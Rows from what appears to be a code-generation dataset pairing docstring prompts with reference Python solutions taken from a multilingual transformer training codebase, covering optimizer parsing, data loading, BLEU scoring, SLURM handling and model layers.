Parse optimizer parameters. Input should be of the form: - "sgd,lr=0.01" - "adagrad,lr=0.1,lr_decay=0.05"
Here is the function:
def get_optimizer(parameters, s):
"""
Parse optimizer parameters.
Input should be of the form:
- "sgd,lr=0.01"
- "adagrad,lr=0.1,lr_decay=0.05"
"""
if "," in s:
method = s[:s.find(',')]
optim_params = {}
for x in s[s.find(',') + 1:].split(','):
split = x.split('=')
assert len(split) == 2
assert re.match("^[+-]?(\d+(\.\d*)?|\.\d+)$", split[1]) is not None
optim_params[split[0]] = float(split[1])
else:
method = s
optim_params = {}
if method == 'adadelta':
optim_fn = optim.Adadelta
elif method == 'adagrad':
optim_fn = optim.Adagrad
elif method == 'adam':
optim_fn = optim.Adam
optim_params['betas'] = (optim_params.get('beta1', 0.9), optim_params.get('beta2', 0.999))
optim_params.pop('beta1', None)
optim_params.pop('beta2', None)
elif method == 'adam_inverse_sqrt':
optim_fn = AdamInverseSqrtWithWarmup
optim_params['betas'] = (optim_params.get('beta1', 0.9), optim_params.get('beta2', 0.999))
optim_params.pop('beta1', None)
optim_params.pop('beta2', None)
elif method == 'adamax':
optim_fn = optim.Adamax
elif method == 'asgd':
optim_fn = optim.ASGD
elif method == 'rmsprop':
optim_fn = optim.RMSprop
elif method == 'rprop':
optim_fn = optim.Rprop
elif method == 'sgd':
optim_fn = optim.SGD
assert 'lr' in optim_params
else:
raise Exception('Unknown optimization method: "%s"' % method)
# check that we give good parameters to the optimizer
expected_args = inspect.getargspec(optim_fn.__init__)[0]
assert expected_args[:2] == ['self', 'params']
if not all(k in expected_args[2:] for k in optim_params.keys()):
raise Exception('Unexpected parameters: expected "%s", got "%s"' % (
str(expected_args[2:]), str(optim_params.keys())))
return optim_fn(parameters, **optim_params) | Parse optimizer parameters. Input should be of the form: - "sgd,lr=0.01" - "adagrad,lr=0.1,lr_decay=0.05" |
3,833 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `to_cuda` function. Write a Python function `def to_cuda(*args)` to solve the following problem:
Move tensors to CUDA.
Here is the function:
def to_cuda(*args):
"""
Move tensors to CUDA.
"""
return [None if x is None else x.cuda() for x in args] | Move tensors to CUDA. |
3,834 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `restore_segmentation` function. Write a Python function `def restore_segmentation(path)` to solve the following problem:
Take a file segmented with BPE and restore it to its original segmentation.
Here is the function:
def restore_segmentation(path):
"""
Take a file segmented with BPE and restore it to its original segmentation.
"""
assert os.path.isfile(path)
restore_cmd = "sed -i -r 's/(@@ )|(@@ ?$)//g' %s"
subprocess.Popen(restore_cmd % path, shell=True).wait() | Take a file segmented with BPE and restore it to its original segmentation. |
3,835 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
DYNAMIC_COEFF = ['lambda_clm', 'lambda_mlm', 'lambda_pc', 'lambda_ae', 'lambda_mt', 'lambda_bt', 'lambda_mass', 'lambda_bmt', 'lambda_span']
The provided code snippet includes necessary dependencies for implementing the `parse_lambda_config` function. Write a Python function `def parse_lambda_config(params)` to solve the following problem:
Parse the configuration of lambda coefficient (for scheduling). x = "3" # lambda will be a constant equal to x x = "0:1,1000:0" # lambda will start from 1 and linearly decrease to 0 during the first 1000 iterations x = "0:0,1000:0,2000:1" # lambda will be equal to 0 for the first 1000 iterations, then will linearly increase to 1 until iteration 2000
Here is the function:
def parse_lambda_config(params):
"""
Parse the configuration of lambda coefficient (for scheduling).
x = "3" # lambda will be a constant equal to x
x = "0:1,1000:0" # lambda will start from 1 and linearly decrease to 0 during the first 1000 iterations
x = "0:0,1000:0,2000:1" # lambda will be equal to 0 for the first 1000 iterations, then will linearly increase to 1 until iteration 2000
"""
for name in DYNAMIC_COEFF:
x = getattr(params, name)
split = x.split(',')
if len(split) == 1:
setattr(params, name, float(x))
setattr(params, name + '_config', None)
else:
split = [s.split(':') for s in split]
assert all(len(s) == 2 for s in split)
assert all(k.isdigit() for k, _ in split)
assert all(int(split[i][0]) < int(split[i + 1][0]) for i in range(len(split) - 1))
setattr(params, name, float(split[0][1]))
setattr(params, name + '_config', [(int(k), float(v)) for k, v in split]) | Parse the configuration of lambda coefficient (for scheduling). x = "3" # lambda will be a constant equal to x x = "0:1,1000:0" # lambda will start from 1 and linearly decrease to 0 during the first 1000 iterations x = "0:0,1000:0,2000:1" # lambda will be equal to 0 for the first 1000 iterations, then will linearly increase to 1 until iteration 2000 |
3,836 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
DYNAMIC_COEFF = ['lambda_clm', 'lambda_mlm', 'lambda_pc', 'lambda_ae', 'lambda_mt', 'lambda_bt', 'lambda_mass', 'lambda_bmt', 'lambda_span']
def get_lambda_value(config, n_iter):
"""
Compute a lambda value according to its schedule configuration.
"""
ranges = [i for i in range(len(config) - 1) if config[i][0] <= n_iter < config[i + 1][0]]
if len(ranges) == 0:
assert n_iter >= config[-1][0]
return config[-1][1]
assert len(ranges) == 1
i = ranges[0]
x_a, y_a = config[i]
x_b, y_b = config[i + 1]
return y_a + (n_iter - x_a) * float(y_b - y_a) / float(x_b - x_a)
The provided code snippet includes necessary dependencies for implementing the `update_lambdas` function. Write a Python function `def update_lambdas(params, n_iter)` to solve the following problem:
Update all lambda coefficients.
Here is the function:
def update_lambdas(params, n_iter):
"""
Update all lambda coefficients.
"""
for name in DYNAMIC_COEFF:
config = getattr(params, name + '_config')
if config is not None:
setattr(params, name, get_lambda_value(config, n_iter)) | Update all lambda coefficients. |
3,837 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `set_sampling_probs` function. Write a Python function `def set_sampling_probs(data, params)` to solve the following problem:
Set the probability of sampling specific languages / language pairs during training.
Here is the function:
def set_sampling_probs(data, params):
"""
Set the probability of sampling specific languages / language pairs during training.
"""
coeff = params.lg_sampling_factor
if coeff == -1:
return
assert coeff > 0
# monolingual data
params.mono_list = [k for k, v in data['mono_stream'].items() if 'train' in v]
if len(params.mono_list) > 0:
probs = np.array([1.0 * len(data['mono_stream'][lang]['train']) for lang in params.mono_list])
probs /= probs.sum()
probs = np.array([p ** coeff for p in probs])
probs /= probs.sum()
params.mono_probs = probs
# parallel data
params.para_list = [k for k, v in data['para'].items() if 'train' in v]
if len(params.para_list) > 0:
probs = np.array([1.0 * len(data['para'][(l1, l2)]['train']) for (l1, l2) in params.para_list])
probs /= probs.sum()
probs = np.array([p ** coeff for p in probs])
probs /= probs.sum()
params.para_probs = probs | Set the probability of sampling specific languages / language pairs during training. |
3,838 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `concat_batches` function. Write a Python function `def concat_batches(x1, len1, lang1_id, x2, len2, lang2_id, pad_idx, eos_idx, reset_positions)` to solve the following problem:
Concat batches with different languages.
Here is the function:
def concat_batches(x1, len1, lang1_id, x2, len2, lang2_id, pad_idx, eos_idx, reset_positions):
"""
Concat batches with different languages.
"""
assert reset_positions is False or lang1_id != lang2_id
lengths = len1 + len2
if not reset_positions:
lengths -= 1
slen, bs = lengths.max().item(), lengths.size(0)
x = x1.new(slen, bs).fill_(pad_idx)
x[:len1.max().item()].copy_(x1)
positions = torch.arange(slen)[:, None].repeat(1, bs).to(x1.device)
langs = x1.new(slen, bs).fill_(lang1_id)
for i in range(bs):
l1 = len1[i] if reset_positions else len1[i] - 1
x[l1:l1 + len2[i], i].copy_(x2[:len2[i], i])
if reset_positions:
positions[l1:, i] -= len1[i]
langs[l1:, i] = lang2_id
assert (x == eos_idx).long().sum().item() == (4 if reset_positions else 3) * bs
return x, lengths, positions, langs | Concat batches with different languages. |
3,839 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `truncate` function. Write a Python function `def truncate(x, lengths, max_len, eos_index)` to solve the following problem:
Truncate long sentences.
Here is the function:
def truncate(x, lengths, max_len, eos_index):
"""
Truncate long sentences.
"""
if lengths.max().item() > max_len:
x = x[:max_len].clone()
lengths = lengths.clone()
for i in range(len(lengths)):
if lengths[i] > max_len:
lengths[i] = max_len
x[max_len - 1, i] = eos_index
return x, lengths | Truncate long sentences. |
3,840 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `shuf_order` function. Write a Python function `def shuf_order(langs, params=None, n=5)` to solve the following problem:
Randomize training order.
Here is the function:
def shuf_order(langs, params=None, n=5):
"""
Randomize training order.
"""
if len(langs) == 0:
return []
if params is None:
return [langs[i] for i in np.random.permutation(len(langs))]
# sample monolingual and parallel languages separately
mono = [l1 for l1, l2 in langs if l2 is None]
para = [(l1, l2) for l1, l2 in langs if l2 is not None]
# uniform / weighted sampling
if params.lg_sampling_factor == -1:
p_mono = None
p_para = None
else:
p_mono = np.array([params.mono_probs[params.mono_list.index(k)] for k in mono])
p_para = np.array([params.para_probs[params.para_list.index(tuple(sorted(k)))] for k in para])
p_mono = p_mono / p_mono.sum()
p_para = p_para / p_para.sum()
s_mono = [mono[i] for i in np.random.choice(len(mono), size=min(n, len(mono)), p=p_mono, replace=True)] if len(mono) > 0 else []
s_para = [para[i] for i in np.random.choice(len(para), size=min(n, len(para)), p=p_para, replace=True)] if len(para) > 0 else []
assert len(s_mono) + len(s_para) > 0
return [(lang, None) for lang in s_mono] + s_para | Randomize training order. |
3,841 | from logging import getLogger
import os
import numpy as np
import torch
from .dataset import Dataset, StreamDataset, ParallelDataset
from .dictionary import BOS_WORD, EOS_WORD, PAD_WORD, UNK_WORD, MASK_WORD
The provided code snippet includes necessary dependencies for implementing the `check_data_params` function. Write a Python function `def check_data_params(params)` to solve the following problem:
Check datasets parameters.
Here is the function:
def check_data_params(params):
"""
Check datasets parameters.
"""
# data path
assert os.path.isdir(params.data_path), params.data_path
# check languages
params.langs = params.lgs.split('-') if params.lgs != 'debug' else ['en']
assert len(params.langs) == len(set(params.langs)) >= 1
# assert sorted(params.langs) == params.langs
params.id2lang = {k: v for k, v in enumerate(sorted(params.langs))}
params.lang2id = {k: v for v, k in params.id2lang.items()}
params.n_langs = len(params.langs)
# CLM steps
clm_steps = [s.split('-') for s in params.clm_steps.split(',') if len(s) > 0]
params.clm_steps = [(s[0], None) if len(s) == 1 else tuple(s) for s in clm_steps]
assert all([(l1 in params.langs) and (l2 in params.langs or l2 is None) for l1, l2 in params.clm_steps])
assert len(params.clm_steps) == len(set(params.clm_steps))
# MLM / TLM steps
mlm_steps = [s.split('-') for s in params.mlm_steps.split(',') if len(s) > 0]
params.mlm_steps = [(s[0], None) if len(s) == 1 else tuple(s) for s in mlm_steps]
assert all([(l1 in params.langs) and (l2 in params.langs or l2 is None) for l1, l2 in params.mlm_steps])
assert len(params.mlm_steps) == len(set(params.mlm_steps))
# parallel classification steps
params.pc_steps = [tuple(s.split('-')) for s in params.pc_steps.split(',') if len(s) > 0]
assert all([len(x) == 2 for x in params.pc_steps])
assert all([l1 in params.langs and l2 in params.langs for l1, l2 in params.pc_steps])
assert all([l1 != l2 for l1, l2 in params.pc_steps])
assert len(params.pc_steps) == len(set(params.pc_steps))
# machine translation steps
params.mt_steps = [tuple(s.split('-')) for s in params.mt_steps.split(',') if len(s) > 0]
assert all([len(x) == 2 for x in params.mt_steps])
assert all([l1 in params.langs and l2 in params.langs for l1, l2 in params.mt_steps])
assert all([l1 != l2 for l1, l2 in params.mt_steps])
assert len(params.mt_steps) == len(set(params.mt_steps))
assert len(params.mt_steps) == 0 or not params.encoder_only
# back machine translation steps
params.bmt_steps = [tuple(s.split('-')) for s in params.bmt_steps.split(',') if len(s) > 0]
# denoising auto-encoder steps
params.ae_steps = [s for s in params.ae_steps.split(',') if len(s) > 0]
assert all([lang in params.langs for lang in params.ae_steps])
assert len(params.ae_steps) == len(set(params.ae_steps))
assert len(params.ae_steps) == 0 or not params.encoder_only
# mass steps
params.mass_steps = [s for s in params.mass_steps.split(',') if len(s) > 0]
mass_steps = []
for src in params.mass_steps:
for tgt in params.mass_steps:
if src != tgt:
mass_steps.append(tuple([src, tgt]))
# back-translation steps
params.bt_steps = [tuple(s.split('-')) for s in params.bt_steps.split(',') if len(s) > 0]
assert all([len(x) == 3 for x in params.bt_steps])
assert all([l1 in params.langs and l2 in params.langs and l3 in params.langs for l1, l2, l3 in params.bt_steps])
assert all([l1 == l3 and l1 != l2 for l1, l2, l3 in params.bt_steps])
assert len(params.bt_steps) == len(set(params.bt_steps))
assert len(params.bt_steps) == 0 or not params.encoder_only
params.bt_src_langs = [l1 for l1, _, _ in params.bt_steps]
# check monolingual datasets
required_mono = set([l1 for l1, l2 in (params.mlm_steps + params.clm_steps) if l2 is None] + params.ae_steps + params.bt_src_langs + params.mass_steps)
params.mono_dataset = {
lang: {
splt: os.path.join(params.data_path, '%s.%s.pth' % (splt, lang))
for splt in ['train', 'valid', 'test']
} for lang in params.langs if lang in required_mono
}
assert all([all([os.path.isfile(p) for p in paths.values()]) for paths in params.mono_dataset.values()])
# check parallel datasets
required_para_train = set(params.clm_steps + params.mlm_steps + params.pc_steps + params.mt_steps)
required_para = required_para_train | set([(l2, l3) for _, l2, l3 in params.bt_steps] + mass_steps)
params.para_dataset = {
(src, tgt): {
splt: (os.path.join(params.data_path, '%s.%s-%s.%s.pth' % (splt, src, tgt, src)),
os.path.join(params.data_path, '%s.%s-%s.%s.pth' % (splt, src, tgt, tgt)))
for splt in ['train', 'valid', 'test']
if splt != 'train' or (src, tgt) in required_para_train or (tgt, src) in required_para_train
} for src in params.langs for tgt in params.langs
if src < tgt and ((src, tgt) in required_para or (tgt, src) in required_para)
}
assert all([all([os.path.isfile(p1) and os.path.isfile(p2) for p1, p2 in paths.values()]) for paths in params.para_dataset.values()])
# back parallel datasets
params.back_dataset = {
(src, tgt): (
os.path.join(params.data_path, '%s-%s.%s.pth' % (src, tgt, src)),
os.path.join(params.data_path, '%s-%s.%s.pth' % (src, tgt, tgt))
) for (src, tgt) in params.bmt_steps
}
# check that we can evaluate on BLEU
assert params.eval_bleu is False or len(params.mt_steps + params.bt_steps + mass_steps) > 0 | Check datasets parameters. |
3,842 | from logging import getLogger
import os
import numpy as np
import torch
from .dataset import Dataset, StreamDataset, ParallelDataset
from .dictionary import BOS_WORD, EOS_WORD, PAD_WORD, UNK_WORD, MASK_WORD
logger = getLogger()
def load_mono_data(params, data):
"""
Load monolingual data.
"""
data['mono'] = {}
data['mono_stream'] = {}
for lang in params.mono_dataset.keys():
logger.info('============ Monolingual data (%s)' % lang)
assert lang in params.langs and lang not in data['mono']
data['mono'][lang] = {}
data['mono_stream'][lang] = {}
for splt in ['train', 'valid', 'test']:
# no need to load training data for evaluation
if splt == 'train' and params.eval_only:
continue
# load data / update dictionary parameters / update data
mono_data = load_binarized(params.mono_dataset[lang][splt], params)
set_dico_parameters(params, data, mono_data['dico'])
# create stream dataset
data['mono_stream'][lang][splt] = StreamDataset(mono_data['sentences'], mono_data['positions'], params)
# if there are several processes on the same machine, we can split the dataset
if splt == 'train' and params.split_data and 1 < params.n_gpu_per_node <= data['mono_stream'][lang][splt].n_batches:
n_batches = data['mono_stream'][lang][splt].n_batches // params.n_gpu_per_node
a = n_batches * params.local_rank
b = n_batches * params.local_rank + n_batches
data['mono_stream'][lang][splt].select_data(a, b)
# for denoising auto-encoding and online back-translation, we need a non-stream (batched) dataset
if lang in params.ae_steps or lang in params.bt_src_langs or lang in params.mass_steps:
# create batched dataset
dataset = Dataset(mono_data['sentences'], mono_data['positions'], params)
# remove empty and too long sentences
if splt == 'train':
dataset.remove_empty_sentences()
dataset.remove_long_sentences(params.max_len)
dataset.remove_short_sentences(params.min_len)
# if there are several processes on the same machine, we can split the dataset
if splt == 'train' and params.n_gpu_per_node > 1 and params.split_data:
n_sent = len(dataset) // params.n_gpu_per_node
a = n_sent * params.local_rank
b = n_sent * params.local_rank + n_sent
dataset.select_data(a, b)
data['mono'][lang][splt] = dataset
logger.info("")
logger.info("")
def load_para_data(params, data):
"""
Load parallel data.
"""
data['para'] = {}
required_para_train = set(params.clm_steps + params.mlm_steps + params.pc_steps + params.mt_steps)
for src, tgt in params.para_dataset.keys():
logger.info('============ Parallel data (%s-%s)' % (src, tgt))
assert (src, tgt) not in data['para']
data['para'][(src, tgt)] = {}
for splt in ['train', 'valid', 'test']:
# no need to load training data for evaluation
if splt == 'train' and params.eval_only:
continue
# for back-translation, we can't load training data
if splt == 'train' and (src, tgt) not in required_para_train and (tgt, src) not in required_para_train:
continue
# load binarized datasets
src_path, tgt_path = params.para_dataset[(src, tgt)][splt]
src_data = load_binarized(src_path, params)
tgt_data = load_binarized(tgt_path, params)
# update dictionary parameters
set_dico_parameters(params, data, src_data['dico'])
set_dico_parameters(params, data, tgt_data['dico'])
# create ParallelDataset
dataset = ParallelDataset(
src_data['sentences'], src_data['positions'],
tgt_data['sentences'], tgt_data['positions'],
params,
)
# remove empty and too long sentences
if splt == 'train':
dataset.remove_empty_sentences()
dataset.remove_long_sentences(params.max_len)
# for validation and test set, enumerate sentence per sentence
if splt != 'train':
dataset.tokens_per_batch = -1
# if there are several processes on the same machine, we can split the dataset
if splt == 'train' and params.n_gpu_per_node > 1 and params.split_data:
n_sent = len(dataset) // params.n_gpu_per_node
a = n_sent * params.local_rank
b = n_sent * params.local_rank + n_sent
dataset.select_data(a, b)
data['para'][(src, tgt)][splt] = dataset
logger.info("")
logger.info("")
def load_back_data(params, data):
data['back'] = {}
required_back_train = set(params.bmt_steps)
for src, tgt in params.back_dataset.keys():
logger.info('============ Back Parallel data (%s-%s)' % (src, tgt))
assert (src, tgt) not in data['back']
data['back'][(src, tgt)] = {}
# load binarized datasets
src_path, tgt_path = params.back_dataset[(src, tgt)]
src_data = load_binarized(src_path, params)
tgt_data = load_binarized(tgt_path, params)
set_dico_parameters(params, data, src_data['dico'])
set_dico_parameters(params, data, tgt_data['dico'])
dataset = ParallelDataset(
src_data['sentences'], src_data['positions'],
tgt_data['sentences'], tgt_data['positions'],
params,
)
dataset.remove_empty_sentences()
dataset.remove_long_sentences(params.max_len)
if params.n_gpu_per_node > 1 and params.split_data:
n_sent = len(dataset) // params.n_gpu_per_node
a = n_sent * params.local_rank
b = n_sent * params.local_rank + n_sent
dataset.select_data(a, b)
data['back'][(src, tgt)] = dataset
logger.info("")
The provided code snippet includes necessary dependencies for implementing the `load_data` function. Write a Python function `def load_data(params)` to solve the following problem:
Load monolingual data. The returned dictionary contains: - dico (dictionary) - vocab (FloatTensor) - train / valid / test (monolingual datasets)
Here is the function:
def load_data(params):
"""
Load monolingual data.
The returned dictionary contains:
- dico (dictionary)
- vocab (FloatTensor)
- train / valid / test (monolingual datasets)
"""
data = {}
# monolingual datasets
load_mono_data(params, data)
# parallel datasets
load_para_data(params, data)
# back translation datasets
load_back_data(params, data)
# monolingual data summary
logger.info('============ Data summary')
for lang, v in data['mono_stream'].items():
for data_set in v.keys():
logger.info('{: <18} - {: >5} - {: >12}:{: >10}'.format('Monolingual data', data_set, lang, len(v[data_set])))
# parallel data summary
for (src, tgt), v in data['para'].items():
for data_set in v.keys():
logger.info('{: <18} - {: >5} - {: >12}:{: >10}'.format('Parallel data', data_set, '%s-%s' % (src, tgt), len(v[data_set])))
logger.info("")
return data | Load monolingual data. The returned dictionary contains: - dico (dictionary) - vocab (FloatTensor) - train / valid / test (monolingual datasets) |
3,843 | from logging import getLogger
import os
import subprocess
from collections import OrderedDict
import numpy as np
import torch
from ..utils import to_cuda, restore_segmentation, concat_batches
The provided code snippet includes necessary dependencies for implementing the `convert_to_text` function. Write a Python function `def convert_to_text(batch, lengths, dico, params)` to solve the following problem:
Convert a batch of sentences to a list of text sentences.
Here is the function:
def convert_to_text(batch, lengths, dico, params):
"""
Convert a batch of sentences to a list of text sentences.
"""
batch = batch.cpu().numpy()
lengths = lengths.cpu().numpy()
slen, bs = batch.shape
assert lengths.max() == slen and lengths.shape[0] == bs
assert (batch[0] == params.eos_index).sum() == bs
assert (batch == params.eos_index).sum() == 2 * bs
sentences = []
for j in range(bs):
words = []
for k in range(1, lengths[j]):
if batch[k, j] == params.eos_index:
break
words.append(dico[batch[k, j]])
sentences.append(" ".join(words))
return sentences | Convert a batch of sentences to a list of text sentences. |
3,844 | from logging import getLogger
import os
import subprocess
from collections import OrderedDict
import numpy as np
import torch
from ..utils import to_cuda, restore_segmentation, concat_batches
BLEU_SCRIPT_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'multi-bleu.perl')
assert os.path.isfile(BLEU_SCRIPT_PATH)
logger = getLogger()
The provided code snippet includes necessary dependencies for implementing the `eval_moses_bleu` function. Write a Python function `def eval_moses_bleu(ref, hyp)` to solve the following problem:
Given a file of hypothesis and reference files, evaluate the BLEU score using Moses scripts.
Here is the function:
def eval_moses_bleu(ref, hyp):
"""
Given a file of hypothesis and reference files,
evaluate the BLEU score using Moses scripts.
"""
assert os.path.isfile(hyp)
assert os.path.isfile(ref) or os.path.isfile(ref + '0')
assert os.path.isfile(BLEU_SCRIPT_PATH)
command = BLEU_SCRIPT_PATH + ' %s < %s'
p = subprocess.Popen(command % (ref, hyp), stdout=subprocess.PIPE, shell=True)
result = p.communicate()[0].decode("utf-8")
if result.startswith('BLEU'):
return float(result[7:result.index(',')])
else:
logger.warning('Impossible to parse BLEU score! "%s"' % result)
return -1 | Given a file of hypothesis and reference files, evaluate the BLEU score using Moses scripts. |
3,845 | from logging import getLogger
import os
import sys
import torch
import socket
import signal
import subprocess
logger = getLogger()
def sig_handler(signum, frame):
logger.warning("Signal handler called with signal " + str(signum))
prod_id = int(os.environ['SLURM_PROCID'])
logger.warning("Host: %s - Global rank: %i" % (socket.gethostname(), prod_id))
if prod_id == 0:
logger.warning("Requeuing job " + os.environ['SLURM_JOB_ID'])
os.system('scontrol requeue ' + os.environ['SLURM_JOB_ID'])
else:
logger.warning("Not the master process, no need to requeue.")
sys.exit(-1)
def term_handler(signum, frame):
logger.warning("Signal handler called with signal " + str(signum))
logger.warning("Bypassing SIGTERM.")
The provided code snippet includes necessary dependencies for implementing the `init_signal_handler` function. Write a Python function `def init_signal_handler()` to solve the following problem:
Handle signals sent by SLURM for time limit / pre-emption.
Here is the function:
def init_signal_handler():
"""
Handle signals sent by SLURM for time limit / pre-emption.
"""
signal.signal(signal.SIGUSR1, sig_handler)
signal.signal(signal.SIGTERM, term_handler)
logger.warning("Signal handler installed.") | Handle signals sent by SLURM for time limit / pre-emption. |
3,846 | from logging import getLogger
import os
import sys
import torch
import socket
import signal
import subprocess
The provided code snippet includes necessary dependencies for implementing the `init_distributed_mode` function. Write a Python function `def init_distributed_mode(params)` to solve the following problem:
Handle single and multi-GPU / multi-node / SLURM jobs. Initialize the following variables: - n_nodes - node_id - local_rank - global_rank - world_size
Here is the function:
def init_distributed_mode(params):
"""
Handle single and multi-GPU / multi-node / SLURM jobs.
Initialize the following variables:
- n_nodes
- node_id
- local_rank
- global_rank
- world_size
"""
params.is_slurm_job = 'SLURM_JOB_ID' in os.environ and not params.debug_slurm
print("SLURM job: %s" % str(params.is_slurm_job))
# SLURM job
if params.is_slurm_job:
assert params.local_rank == -1 # on the cluster, this is handled by SLURM
SLURM_VARIABLES = [
'SLURM_JOB_ID',
'SLURM_JOB_NODELIST', 'SLURM_JOB_NUM_NODES', 'SLURM_NTASKS', 'SLURM_TASKS_PER_NODE',
'SLURM_MEM_PER_NODE', 'SLURM_MEM_PER_CPU',
'SLURM_NODEID', 'SLURM_PROCID', 'SLURM_LOCALID', 'SLURM_TASK_PID'
]
PREFIX = "%i - " % int(os.environ['SLURM_PROCID'])
for name in SLURM_VARIABLES:
value = os.environ.get(name, None)
print(PREFIX + "%s: %s" % (name, str(value)))
# # job ID
# params.job_id = os.environ['SLURM_JOB_ID']
# number of nodes / node ID
params.n_nodes = int(os.environ['SLURM_JOB_NUM_NODES'])
params.node_id = int(os.environ['SLURM_NODEID'])
# local rank on the current node / global rank
params.local_rank = int(os.environ['SLURM_LOCALID'])
params.global_rank = int(os.environ['SLURM_PROCID'])
# number of processes / GPUs per node
params.world_size = int(os.environ['SLURM_NTASKS'])
params.n_gpu_per_node = params.world_size // params.n_nodes
# define master address and master port
hostnames = subprocess.check_output(['scontrol', 'show', 'hostnames', os.environ['SLURM_JOB_NODELIST']])
params.master_addr = hostnames.split()[0].decode('utf-8')
assert 10001 <= params.master_port <= 20000 or params.world_size == 1
print(PREFIX + "Master address: %s" % params.master_addr)
print(PREFIX + "Master port : %i" % params.master_port)
# set environment variables for 'env://'
os.environ['MASTER_ADDR'] = params.master_addr
os.environ['MASTER_PORT'] = str(params.master_port)
os.environ['WORLD_SIZE'] = str(params.world_size)
os.environ['RANK'] = str(params.global_rank)
# multi-GPU job (local or multi-node) - jobs started with torch.distributed.launch
elif params.local_rank != -1:
assert params.master_port == -1
# read environment variables
params.global_rank = int(os.environ['RANK'])
params.world_size = int(os.environ['WORLD_SIZE'])
params.n_gpu_per_node = int(os.environ['NGPU'])
# number of nodes / node ID
params.n_nodes = params.world_size // params.n_gpu_per_node
params.node_id = params.global_rank // params.n_gpu_per_node
# local job (single GPU)
else:
assert params.local_rank == -1
assert params.master_port == -1
params.n_nodes = 1
params.node_id = 0
params.local_rank = 0
params.global_rank = 0
params.world_size = 1
params.n_gpu_per_node = 1
# sanity checks
assert params.n_nodes >= 1
assert 0 <= params.node_id < params.n_nodes
assert 0 <= params.local_rank <= params.global_rank < params.world_size
assert params.world_size == params.n_nodes * params.n_gpu_per_node
# define whether this is the master process / if we are in distributed mode
params.is_master = params.node_id == 0 and params.local_rank == 0
params.multi_node = params.n_nodes > 1
params.multi_gpu = params.world_size > 1
# summary
PREFIX = "%i - " % params.global_rank
print(PREFIX + "Number of nodes: %i" % params.n_nodes)
print(PREFIX + "Node ID : %i" % params.node_id)
print(PREFIX + "Local rank : %i" % params.local_rank)
print(PREFIX + "Global rank : %i" % params.global_rank)
print(PREFIX + "World size : %i" % params.world_size)
print(PREFIX + "GPUs per node : %i" % params.n_gpu_per_node)
print(PREFIX + "Master : %s" % str(params.is_master))
print(PREFIX + "Multi-node : %s" % str(params.multi_node))
print(PREFIX + "Multi-GPU : %s" % str(params.multi_gpu))
print(PREFIX + "Hostname : %s" % socket.gethostname())
# set GPU device
torch.cuda.set_device(params.local_rank)
# initialize multi-GPU
if params.multi_gpu:
# http://pytorch.apachecn.org/en/0.3.0/distributed.html#environment-variable-initialization
# 'env://' will read these environment variables:
# MASTER_PORT - required; has to be a free port on machine with rank 0
# MASTER_ADDR - required (except for rank 0); address of rank 0 node
# WORLD_SIZE - required; can be set either here, or in a call to init function
# RANK - required; can be set either here, or in a call to init function
print("Initializing PyTorch distributed ...")
torch.distributed.init_process_group(
init_method='env://',
backend='nccl',
) | Handle single and multi-GPU / multi-node / SLURM jobs. Initialize the following variables: - n_nodes - node_id - local_rank - global_rank - world_size |
3,847 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def Embedding(num_embeddings, embedding_dim, padding_idx=None):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
if padding_idx is not None:
nn.init.constant_(m.weight[padding_idx], 0)
return m | null |
3,848 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
# nn.init.normal_(m.weight, mean=0, std=1)
# nn.init.xavier_uniform_(m.weight)
# nn.init.constant_(m.bias, 0.)
return m | null |
3,849 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def create_sinusoidal_embeddings(n_pos, dim, out):
position_enc = np.array([
[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)]
for pos in range(n_pos)
])
out[:, 0::2] = torch.FloatTensor(np.sin(position_enc[:, 0::2]))
out[:, 1::2] = torch.FloatTensor(np.cos(position_enc[:, 1::2]))
out.detach_()
out.requires_grad = False | null |
3,850 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
The provided code snippet includes necessary dependencies for implementing the `gelu` function. Write a Python function `def gelu(x)` to solve the following problem:
GELU activation https://arxiv.org/abs/1606.08415 https://github.com/huggingface/pytorch-openai-transformer-lm/blob/master/model_pytorch.py#L14 https://github.com/huggingface/pytorch-pretrained-BERT/blob/master/modeling.py
Here is the function:
def gelu(x):
"""
GELU activation
https://arxiv.org/abs/1606.08415
https://github.com/huggingface/pytorch-openai-transformer-lm/blob/master/model_pytorch.py#L14
https://github.com/huggingface/pytorch-pretrained-BERT/blob/master/modeling.py
"""
# return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
return 0.5 * x * (1.0 + torch.erf(x / math.sqrt(2.0))) | GELU activation https://arxiv.org/abs/1606.08415 https://github.com/huggingface/pytorch-openai-transformer-lm/blob/master/model_pytorch.py#L14 https://github.com/huggingface/pytorch-pretrained-BERT/blob/master/modeling.py |
